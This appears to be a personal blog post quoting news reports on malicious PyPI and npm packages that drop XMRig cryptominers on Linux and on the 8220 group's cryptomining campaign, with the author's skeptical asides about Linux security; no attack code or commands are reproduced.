Linux users need to be aware of what they are downloading. PyPI (Python Package Index) is the official third-party software repository for Python.
Python is a high-level, interpreted, general-purpose programming language. Its design philosophy emphasizes code readability with the use of significant indentation.
Python Software Foundation (PSF) is an American nonprofit organization devoted to the Python programming language … mission of the foundation is to foster development of the Python community and is responsible for various processes within the Python community, including developing the core Python distribution, managing intellectual rights, developer conferences including the Python Conference (PyCon), and raising funds.
- Python comes preinstalled on most Linux distributions.
- There are more than 200,000 Python packages in the world (and that’s just counting those hosted on PyPI, the official Python Package Index). That begs the question: with so many packages out there, which are the most important ones that every Python programmer needs to learn?
This caught my eye yesterday…
241 npm and PyPI packages caught dropping Linux cryptominers:
PyPI, npm flooded with cryptomining packages
Researchers have caught at least 241 malicious npm and PyPI packages that drop cryptominers after infecting Linux machines.
While the researcher was in the process of reporting these 33 malicious projects to PyPI admins, he noticed the threat actor began publishing another set of 22 packages with the same malicious payload.
“After I reported them to PyPI, they were quickly deleted – but the malicious actor was still in the process of uploading more packages, and uploaded another 22,” Lübbers tells BleepingComputer.
“The packages targeted Linux systems and installed crypto mining software XMRig,” explains the software engineer.
The Python packages contain the following piece of code that downloads the Bash script from the threat actor’s server via Bit.ly URL shortener.
Sounds like a ‘Cousin’ of the Gremlins!? 😉
Microsoft Warns of Cryptomining Malware Campaign Targeting Linux Servers:
A cloud threat actor group tracked as 8220 has updated its malware toolset to breach Linux servers with the goal of installing crypto miners as part of a long-running campaign.
“The updates include the deployment of new versions of a crypto miner and an IRC bot,” Microsoft Security Intelligence said in a series of tweets on Thursday. “The group has actively updated its techniques and payloads over the last year.”
8220, active since early 2017, is a Chinese-speaking, Monero-mining threat actor so named for its preference to communicate with command-and-control (C2) servers over port 8220.
Microsoft has tried to help Linux wid their security issues, but there is just not much that can be done when it’s Open Source.
Will add this post to the *Linux Security Issues* page…
LINUX IS LIKE A BOX OF CHOCOLATES – you never know what you’re gonna get!